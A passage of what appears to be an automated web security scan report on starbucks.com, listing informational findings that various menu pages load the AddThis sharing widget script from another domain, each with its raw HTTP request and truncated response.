   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.70. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:46 GMT
Connection: close
Content-Length: 39510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.71. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:15 GMT
Connection: close
Content-Length: 39644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.72. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-frappuccino

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/coffee-frappuccino HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:25 GMT
Connection: close
Content-Length: 39621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.73. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:59 GMT
Connection: close
Content-Length: 39700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.74. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:28:21 GMT
Connection: close
Content-Length: 40012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.75. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:35 GMT
Connection: close
Content-Length: 39780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.76. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:27:40 GMT
Connection: close
Content-Length: 39676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.77. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/bold-pick-of-the-day

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/bold-pick-of-the-day HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:09 GMT
Connection: close
Content-Length: 41039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.78. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/cafe-misto

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/cafe-misto HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:15 GMT
Connection: close
Content-Length: 41032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.79. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/clover-brewed-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/clover-brewed-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:16 GMT
Connection: close
Content-Length: 40624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.80. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/coffee-traveler

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/coffee-traveler HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:22 GMT
Connection: close
Content-Length: 38969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.81. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/decaf-pike-place-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/decaf-pike-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:04 GMT
Connection: close
Content-Length: 40823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.82. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/iced-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/iced-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:20 GMT
Connection: close
Content-Length: 40920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.83. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/pikes-place-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/brewed-coffee/pikes-place-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:02 GMT
Connection: close
Content-Length: 40634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.84. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:12 GMT
Connection: close
Content-Length: 40877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.85. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/peppermint-mocha-hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/peppermint-mocha-hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:15 GMT
Connection: close
Content-Length: 41092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.86. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/salted-caramel-hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/salted-caramel-hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:17 GMT
Connection: close
Content-Length: 41381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.87. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/white-hot-chocolate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/chocolate/white-hot-chocolate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:19 GMT
Connection: close
Content-Length: 40972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.88. http://www.starbucks.com/menu/drinks/espresso/caffe-americano

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-americano

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caffe-americano HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:33 GMT
Connection: close
Content-Length: 42738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.89. http://www.starbucks.com/menu/drinks/espresso/caffe-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/espresso/caffe-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:38 GMT
Connection: close
Content-Length: 42513

